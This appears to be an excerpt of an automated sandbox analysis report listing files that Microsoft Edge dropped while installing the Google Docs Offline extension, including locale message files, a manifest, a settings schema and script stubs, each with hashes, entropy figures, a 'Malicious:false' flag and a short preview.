                                                                                                                                                                                                                                                                                                      SHA-512:E55167CB5638E04DF3543D57C8027B86B9483BFCAFA8E7C148EDED66454AEBF554B4C1CF3C33E93EC63D73E43800D6A6E7B9B1A1B0798B6BDB2F699D3989B052
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "..... ...... ........ ......".. },.. "explanationofflinedisabled": {.. "message": ".... ........... ........ ......... ........ ....... Google Docs... .............., .... ............ ....... ..... ...... .... Google Docs .... ...... ............. ......, ........ ........ ... .......".. },.. "explanationofflineenabled": {.. "message": ".... ........... ......., .... .... ........ .......... .... ....... ..... ....... .... ..

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir3084_159575964\CRX_INSTALL\_locales\th\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1674
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.343724179386811
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:48:fcGjnU3UnGKD1GeU3pktOggV1tL2ggG7Q:f3jnDG1eUk0g6RLE
                                                                                                                                                                                                                                                                                                      MD5:64077E3D186E585A8BEA86FF415AA19D
                                                                                                                                                                                                                                                                                                      SHA1:73A861AC810DABB4CE63AD052E6E1834F8CA0E65
                                                                                                                                                                                                                                                                                                      SHA-256:D147631B2334A25B8AA4519E4A30FB3A1A85B6A0396BC688C68DC124EC387D58
                                                                                                                                                                                                                                                                                                      SHA-512:56DD389EB9DD335A6214E206B3BF5D63562584394D1DE1928B67D369E548477004146E6CB2AD19D291CB06564676E2B2AC078162356F6BC9278B04D29825EF0C
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": ".............. ............. Google .................................... ............................... Google ...... .................................................................".. },.. "explanationofflineenabled": {.. "message": "................................................................".. },.. "extdesc": {.. "message": "..... ..... ........

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir3084_159575964\CRX_INSTALL\_locales\tr\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1063
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.853399816115876
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAowYuBPgoMC4AGehrgGm7tJ3ckwFrXnRs5m:GYsPgrCtGehkGc3cvXr
                                                                                                                                                                                                                                                                                                      MD5:76B59AAACC7B469792694CF3855D3F4C
                                                                                                                                                                                                                                                                                                      SHA1:7C04A2C1C808FA57057A4CCEEE66855251A3C231
                                                                                                                                                                                                                                                                                                      SHA-256:B9066A162BEE00FD50DC48C71B32B69DFFA362A01F84B45698B017A624F46824
                                                                                                                                                                                                                                                                                                      SHA-512:2E507CA6874DE8028DC769F3D9DFD9E5494C268432BA41B51568D56F7426F8A5F2E5B111DDD04259EB8D9A036BB4E3333863A8FC65AAB793BCEF39EDFE41403B
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "YEN. OLU.TUR".. },.. "explanationofflinedisabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Google Dok.manlar'. .nternet ba.lant.s. olmadan kullanmak i.in, .nternet'e ba.lanabildi.inizde Google Dok.manlar ana sayfas.nda Ayarlar'a gidin ve .evrimd... senkronizasyonu etkinle.tirin.".. },.. "explanationofflineenabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Ancak, yine de mevcut dosyalar. d.zenleyebilir veya yeni dosyalar olu.turabilirsiniz.".. },.. "extdesc": {.. "message": "Dok.man, e-tablo ve sunu olu.turun, bunlar. d.zenleyin ve g.r.nt.leyin. T.m bu i.lemleri internet eri.imi olmadan yapabilirsiniz.".. },.. "extname": {.. "message": "Google Dok.manlar .evrimd...".. },.. "learnmore": {.. "message": "Daha Fazla Bilgi".. },.. "popuphelptext": {.. "message": ".nternet ba.lant.n.z olsun veya olmas.n, nerede olursan.z olun yaz.n, d.zenl

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir3084_159575964\CRX_INSTALL\_locales\uk\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1333
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.686760246306605
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAk9oxkm6H4KyGGB9GeGoxPEYMQhpARezTtHUN97zlwpEH7:VKU1GB9GeBc/OARETt+9/WCb
                                                                                                                                                                                                                                                                                                      MD5:970963C25C2CEF16BB6F60952E103105
                                                                                                                                                                                                                                                                                                      SHA1:BBDDACFEEE60E22FB1C130E1EE8EFDA75EA600AA
                                                                                                                                                                                                                                                                                                      SHA-256:9FA26FF09F6ACDE2457ED366C0C4124B6CAC1435D0C4FD8A870A0C090417DA19
                                                                                                                                                                                                                                                                                                      SHA-512:1BED9FE4D4ADEED3D0BC8258D9F2FD72C6A177C713C3B03FC6F5452B6D6C2CB2236C54EA972ECE7DBFD756733805EB2352CAE44BAB93AA8EA73BB80460349504
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "........".. },.. "explanationofflinedisabled": {.. "message": ".. . ...... ....... ... ............. Google ........... ... ......... . .........., ......... . ............ .. ........ ........ Google .......... . ......... ......-............., .... ...... . .......".. },.. "explanationofflineenabled": {.. "message": ".. . ...... ......, ..... ... .... ...... .......... ........ ..... ... .......... .....".. },.. "extdesc": {.. "message": "........., ......... . ............ ........., .......... ....... .. ........... ... ....... .. ..........".. },.. "extname": {.. "message": "Goo

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir3084_159575964\CRX_INSTALL\_locales\ur\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1263
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.861856182762435
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAl3zNEUhN3mNjkSIkmdNpInuUVsqNtOJDhY8Dvp/IkLzx:e3uUhQKvkmd+s11Lp1F
                                                                                                                                                                                                                                                                                                      MD5:8B4DF6A9281333341C939C244DDB7648
                                                                                                                                                                                                                                                                                                      SHA1:382C80CAD29BCF8AAF52D9A24CA5A6ECF1941C6B
                                                                                                                                                                                                                                                                                                      SHA-256:5DA836224D0F3A96F1C5EB5063061AAD837CA9FC6FED15D19C66DA25CF56F8AC
                                                                                                                                                                                                                                                                                                      SHA-512:FA1C015D4EA349F73468C78FDB798D462EEF0F73C1A762298798E19F825E968383B0A133E0A2CE3B3DF95F24C71992235BFC872C69DC98166B44D3183BF8A9E5
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "... ......".. },.. "explanationofflinedisabled": {.. "message": ".. .. .... .... Google Docs .. .... ....... ..... ....... .... ..... .... ... .. .. ....... .. ..... ... .. Google Docs ... ... .. ....... .. ..... ... .. .... ...... ..... .. .. .....".. },.. "explanationofflineenabled": {.. "message": ".. .. .... ... .... .. ... ... ...... ..... ... ..... .. .... ... .. ... ..... ... .... ....".. },.. "extdesc": {.. "message": ".......... .......... ... ....... . .... ... ....... .. ..... .. .... ...... ..... .... ... ..... .......".. },.. "extname": {.. "message": "Google Docs .. ....".. },.. "learnmore": {..

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir3084_159575964\CRX_INSTALL\_locales\vi\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1074
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.062722522759407
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAhBBLEBOVUSUfE+eDFmj4BLErQ7e2CIer32KIxqJ/HtNiE5nIGeU+KCVT:qHCDheDFmjDQgX32/S/hI9jh
                                                                                                                                                                                                                                                                                                      MD5:773A3B9E708D052D6CBAA6D55C8A5438
                                                                                                                                                                                                                                                                                                      SHA1:5617235844595D5C73961A2C0A4AC66D8EA5F90F
                                                                                                                                                                                                                                                                                                      SHA-256:597C5F32BC999746BC5C2ED1E5115C523B7EB1D33F81B042203E1C1DF4BBCAFE
                                                                                                                                                                                                                                                                                                      SHA-512:E5F906729E38B23F64D7F146FA48F3ABF6BAED9AAFC0E5F6FA59F369DC47829DBB4BFA94448580BD61A34E844241F590B8D7AEC7091861105D8EBB2590A3BEE9
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "T.O M.I".. },.. "explanationofflinedisabled": {.. "message": "B.n .ang ngo.i tuy.n. .. s. d.ng Google T.i li.u m. kh.ng c.n k.t n.i Internet, .i ..n c.i ..t tr.n trang ch. c.a Google T.i li.u v. b.t ..ng b. h.a ngo.i tuy.n v.o l.n ti.p theo b.n ...c k.t n.i v.i m.ng Internet.".. },.. "explanationofflineenabled": {.. "message": "B.n .ang ngo.i tuy.n, tuy nhi.n b.n v.n c. th. ch.nh s.a c.c t.p c. s.n ho.c t.o c.c t.p m.i.".. },.. "extdesc": {.. "message": "Ch.nh s.a, t.o v. xem t.i li.u, b.ng t.nh v. b.n tr.nh b.y . t.t c. m. kh.ng c.n truy c.p Internet.".. },.. "extname": {.. "message": "Google T.i li.u ngo.i tuy.n".. },.. "learnmore": {.. "message": "Ti.m hi..u th.m".. },.. "popuphelptext": {.. "message": "Vi.t, ch.nh s.a v. c.ng t.c

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir3084_159575964\CRX_INSTALL\_locales\zh_CN\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):879
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.7905809868505544
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:12:1HASvgteHCBxNtSBXuetOrgIkA2OrWjMOCBxetSBXK01fg/SOiCSUEQ27e1CBhUj:1HAFsHtrIkA2jqldI/727eggcLk9pf
                                                                                                                                                                                                                                                                                                      MD5:3E76788E17E62FB49FB5ED5F4E7A3DCE
                                                                                                                                                                                                                                                                                                      SHA1:6904FFA0D13D45496F126E58C886C35366EFCC11
                                                                                                                                                                                                                                                                                                      SHA-256:E72D0BB08CC3005556E95A498BD737E7783BB0E56DCC202E7D27A536616F5EE0
                                                                                                                                                                                                                                                                                                      SHA-512:F431E570AB5973C54275C9EEF05E49E6FE2D6C17000F98D672DD31F9A1FAD98E0D50B5B0B9CF85D5BBD3B655B93FD69768C194C8C1688CB962AA75FF1AF9BDB6
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "..".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ................ Google ....................".. },.. "explanationofflineenabled": {.. "message": ".............................".. },.. "extdesc": {.. "message": "...................... - ........".. },.. "extname": {.. "message": "Google .......".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "...............................".. }..}..

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir3084_159575964\CRX_INSTALL\_locales\zh_HK\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1205
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.50367724745418
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:YWvqB0f7Cr591AhI9Ah8U1F4rw4wtB9G976d6BY9scKUrPoAhNehIrI/uIXS1:YWvl7Cr5JHrw7k7u6BY9trW+rHR
                                                                                                                                                                                                                                                                                                      MD5:524E1B2A370D0E71342D05DDE3D3E774
                                                                                                                                                                                                                                                                                                      SHA1:60D1F59714F9E8F90EF34138D33FBFF6DD39E85A
                                                                                                                                                                                                                                                                                                      SHA-256:30F44CFAD052D73D86D12FA20CFC111563A3B2E4523B43F7D66D934BA8DACE91
                                                                                                                                                                                                                                                                                                      SHA-512:D2225CF2FA94B01A7B0F70A933E1FDCF69CDF92F76C424CE4F9FCC86510C481C9A87A7B71F907C836CBB1CA41A8BEBBD08F68DBC90710984CA738D293F905272
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"createnew":{"message":"\u5efa\u7acb\u65b0\u9805\u76ee"},"explanationofflinedisabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\u3002\u5982\u8981\u5728\u6c92\u6709\u4e92\u806f\u7db2\u9023\u7dda\u7684\u60c5\u6cc1\u4e0b\u4f7f\u7528\u300cGoogle \u6587\u4ef6\u300d\uff0c\u8acb\u524d\u5f80\u300cGoogle \u6587\u4ef6\u300d\u9996\u9801\u7684\u8a2d\u5b9a\uff0c\u4e26\u5728\u4e0b\u6b21\u9023\u63a5\u4e92\u806f\u7db2\u6642\u958b\u555f\u96e2\u7dda\u540c\u6b65\u529f\u80fd\u3002"},"explanationofflineenabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\uff0c\u4f46\u60a8\u4ecd\u53ef\u4ee5\u7de8\u8f2f\u53ef\u7528\u6a94\u6848\u6216\u5efa\u7acb\u65b0\u6a94\u6848\u3002"},"extdesc":{"message":"\u7de8\u8f2f\u3001\u5efa\u7acb\u53ca\u67e5\u770b\u60a8\u7684\u6587\u4ef6\u3001\u8a66\u7b97\u8868\u548c\u7c21\u5831\uff0c\u5b8c\u5168\u4e0d\u9700\u4f7f\u7528\u4e92\u806f\u7db2\u3002"},"extname":{"message":"\u300cGoogle \u6587\u4ef6\u300d\u96e2\u7dda\u7248"},"learnmore":{"message":"\u77ad\u89e3\u8a

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir3084_159575964\CRX_INSTALL\_locales\zh_TW\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):843
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.76581227215314
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:12:1HASvgmaCBxNtBtA24ZOuAeOEHGOCBxetBtMHQIJECSUnLRNocPNy6CBhU5OGg1O:1HAEfQkekYyLvRmcPGgzcL2kx5U
                                                                                                                                                                                                                                                                                                      MD5:0E60627ACFD18F44D4DF469D8DCE6D30
                                                                                                                                                                                                                                                                                                      SHA1:2BFCB0C3CA6B50D69AD5745FA692BAF0708DB4B5
                                                                                                                                                                                                                                                                                                      SHA-256:F94C6DDEDF067642A1AF18D629778EC65E02B6097A8532B7E794502747AEB008
                                                                                                                                                                                                                                                                                                      SHA-512:6FF517EED4381A61075AC7C8E80C73FAFAE7C0583BA4FA7F4951DD7DBE183C253702DEE44B3276EFC566F295DAC1592271BE5E0AC0C7D2C9F6062054418C7C27
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": ".....".. },.. "explanationofflinedisabled": {.. "message": ".................. Google ................ Google .................".. },.. "explanationofflineenabled": {.. "message": ".........................".. },.. "extdesc": {.. "message": ".............................".. },.. "extname": {.. "message": "Google .....".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "................................".. }..}..

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir3084_159575964\CRX_INSTALL\_locales\zu\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):912
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.65963951143349
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:YlMBKqLnI7EgBLWFQbTQIF+j4h3OadMJzLWnCieqgwLeOvKrCRPE:YlMBKqjI7EQOQb0Pj4heOWqeyaBrMPE
                                                                                                                                                                                                                                                                                                      MD5:71F916A64F98B6D1B5D1F62D297FDEC1
                                                                                                                                                                                                                                                                                                      SHA1:9386E8F723C3F42DA5B3F7E0B9970D2664EA0BAA
                                                                                                                                                                                                                                                                                                      SHA-256:EC78DDD4CCF32B5D76EC701A20167C3FBD146D79A505E4FB0421FC1E5CF4AA63
                                                                                                                                                                                                                                                                                                      SHA-512:30FA4E02120AF1BE6E7CC7DBB15FAE5D50825BD6B3CF28EF21D2F2E217B14AF5B76CFCC165685C3EDC1D09536BFCB10CA07E1E2CC0DA891CEC05E19394AD7144
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"createnew":{"message":"DALA ENTSHA"},"explanationofflinedisabled":{"message":"Awuxhunyiwe ku-inthanethi. Ukuze usebenzise i-Google Amadokhumenti ngaphandle koxhumano lwe-inthanethi, iya kokuthi izilungiselelo ekhasini lasekhaya le-Google Amadokhumenti bese uvula ukuvumelanisa okungaxhunyiwe ku-inthanethi ngesikhathi esilandelayo lapho uxhunywe ku-inthanethi."},"explanationofflineenabled":{"message":"Awuxhunyiwe ku-inthanethi, kodwa usangakwazi ukuhlela amafayela atholakalayo noma udale amasha."},"extdesc":{"message":"Hlela, dala, futhi ubuke amadokhumenti akho, amaspredishithi, namaphrezentheshini \u2014 konke ngaphandle kokufinyelela kwe-inthanethi."},"extname":{"message":"I-Google Amadokhumenti engaxhumekile ku-intanethi"},"learnmore":{"message":"Funda kabanzi"},"popuphelptext":{"message":"Bhala, hlela, futhi hlanganyela noma yikuphi lapho okhona, unalo noma ungenalo uxhumano lwe-inthanethi."}}.

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir3084_159575964\CRX_INSTALL\_metadata\verified_contents.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):11406
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.745845607168024
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:192:RBG1G1UPkUj/86Op//Ier/2nsNLJtwg+K8HNnswuH+svyw6r+cgTSJJT4LGkt:m8IEI4u8/EgG4
                                                                                                                                                                                                                                                                                                      MD5:0A68C9539A188B8BB4F9573F2F2321D6
                                                                                                                                                                                                                                                                                                      SHA1:E0F814FA4DCC04EDC6A5D39CBC1038979E88F0E5
                                                                                                                                                                                                                                                                                                      SHA-256:39E6C25D096AFD156644F07586D85E37F1F7B3DA9B636471E8D15CEB14DB184F
                                                                                                                                                                                                                                                                                                      SHA-512:13F133C173C6622B8E1B6F86A551CBC5B0B2446B3CF96E4AE8CA2646009B99E4A360C2DB3168CB94A488FAEBD215003DFA60D10150B7A85B5F8919900BD01CCC
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiIxMjgucG5nIiwicm9vdF9oYXNoIjoiZ2NWZy0xWWgySktRNVFtUmtjZGNmamU1dzVIc1JNN1ZCTmJyaHJ4eGZ5ZyJ9LHsicGF0aCI6Il9sb2NhbGVzL2FmL21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJxaElnV3hDSFVNLWZvSmVFWWFiWWlCNU9nTm9ncUViWUpOcEFhZG5KR0VjIn0seyJwYXRoIjoiX2xvY2FsZXMvYW0vbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IlpPQWJ3cEs2THFGcGxYYjh4RVUyY0VkU0R1aVY0cERNN2lEQ1RKTTIyTzgifSx7InBhdGgiOiJfbG9jYWxlcy9hci9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiUjJVaEZjdTVFcEJfUUZtU19QeGstWWRrSVZqd3l6WEoxdURVZEMyRE9BSSJ9LHsicGF0aCI6Il9sb2NhbGVzL2F6L21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJZVVJ3Mmp4UU5Lem1TZkY0YS1xcTBzbFBSSFc4eUlXRGtMY2g4Ry0zdjJRIn0seyJwYXRoIjoiX2xvY2FsZXMvYmUvbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IjNmRm9XYUZmUHJNelRXSkJsMXlqbUlyRDZ2dzlsa1VxdzZTdjAyUk1oVkEifSx7InBhdGgiOiJfbG9jYWxlcy9iZy9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiSXJ3M3RIem9xREx6bHdGa0hjTllOWFoyNmI0WWVwT2t4ZFN

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir3084_159575964\CRX_INSTALL\dasherSettingSchema.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):854
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.284628987131403
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:12:ont+QByTwnnGNcMbyWM+Q9TZldnnnGGxlF/S0WOtUL0M0r:vOrGe4dDCVGOjWJ0nr
                                                                                                                                                                                                                                                                                                      MD5:4EC1DF2DA46182103D2FFC3B92D20CA5
                                                                                                                                                                                                                                                                                                      SHA1:FB9D1BA3710CF31A87165317C6EDC110E98994CE
                                                                                                                                                                                                                                                                                                      SHA-256:6C69CE0FE6FAB14F1990A320D704FEE362C175C00EB6C9224AA6F41108918CA6
                                                                                                                                                                                                                                                                                                      SHA-512:939D81E6A82B10FF73A35C931052D8D53D42D915E526665079EEB4820DF4D70F1C6AEBAB70B59519A0014A48514833FEFD687D5A3ED1B06482223A168292105D
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{. "type": "object",. "properties": {. "allowedDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Allow users to enable Docs offline for the specified managed domains.",. "description": "Users on managed devices will be able to enable docs offline if they are part of the specified managed domains.". },. "autoEnabledDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Auto enable Docs offline for the specified managed domains in certain eligible situations.",. "description": "Users on managed devices, in certain eligible situations, will be able to automatically access and edit recent files offline for the managed domains set in this property. They can still disable it from Drive settings.". }. }.}.

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir3084_159575964\CRX_INSTALL\manifest.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):2525
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.417954053901
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1HEZ4WPoolELb/KxktGw3VwELb/4iL2QDkUpvdz1xxy/Atj17x9yiVvQe:WdP5aLTKQGwlTLT4oRvvxs/AP7xgiVb
                                                                                                                                                                                                                                                                                                      MD5:5E425DC36364927B1348F6C48B68C948
                                                                                                                                                                                                                                                                                                      SHA1:9E411B88453DEF3F7CFCB3EAA543C69AD832B82F
                                                                                                                                                                                                                                                                                                      SHA-256:32D9C8DE71A40D71FC61AD52AA07E809D07DF57A2F4F7855E8FC300F87FFC642
                                                                                                                                                                                                                                                                                                      SHA-512:C19217B9AF82C1EE1015D4DFC4234A5CE0A4E482430455ABAAFAE3F9C8AE0F7E5D2ED7727502760F1B0656F0A079CB23B132188AE425E001802738A91D8C5D79
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "author": {.. "email": "docs-hosted-app-own@google.com".. },.. "background": {.. "service_worker": "service_worker_bin_prod.js".. },.. "content_capabilities": {.. "matches": [ "https://docs.google.com/*", "https://drive.google.com/*", "https://drive-autopush.corp.google.com/*", "https://drive-daily-0.corp.google.com/*", "https://drive-daily-1.corp.google.com/*", "https://drive-daily-2.corp.google.com/*", "https://drive-daily-3.corp.google.com/*", "https://drive-daily-4.corp.google.com/*", "https://drive-daily-5.corp.google.com/*", "https://drive-daily-6.corp.google.com/*", "https://drive-preprod.corp.google.com/*", "https://drive-staging.corp.google.com/*" ],.. "permissions": [ "clipboardRead", "clipboardWrite", "unlimitedStorage" ].. },.. "content_security_policy": {.. "extension_pages": "script-src 'self'; object-src 'self'".. },.. "default_locale": "en_US",.. "description": "__MSG_extDesc__",.. "externally_connectable": {.. "ma

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir3084_159575964\CRX_INSTALL\offscreendocument.html

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):97
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.862433271815736
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:PouV7uJL5XL/oGLvLAAJR90bZNGXIL0Hac4NGb:hxuJL5XsOv0EmNV4HX4Qb
                                                                                                                                                                                                                                                                                                      MD5:B747B5922A0BC74BBF0A9BC59DF7685F
                                                                                                                                                                                                                                                                                                      SHA1:7BF124B0BE8EE2CFCD2506C1C6FFC74D1650108C
                                                                                                                                                                                                                                                                                                      SHA-256:B9FA2D52A4FFABB438B56184131B893B04655B01F336066415D4FE839EFE64E7
                                                                                                                                                                                                                                                                                                      SHA-512:7567761BE4054FCB31885E16D119CD4E419A423FFB83C3B3ED80BFBF64E78A73C2E97AAE4E24AB25486CD1E43877842DB0836DB58FBFBCEF495BC53F9B2A20EC
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:<!DOCTYPE html>.<html>.<body>. <script src="offscreendocument_main.js"></script>.</body>.</html>

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir3084_159575964\CRX_INSTALL\offscreendocument_main.js

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (4882)
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):122218
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.439997574414675
                                                                                                                                                                                                                                                                                                      Encrypted:false
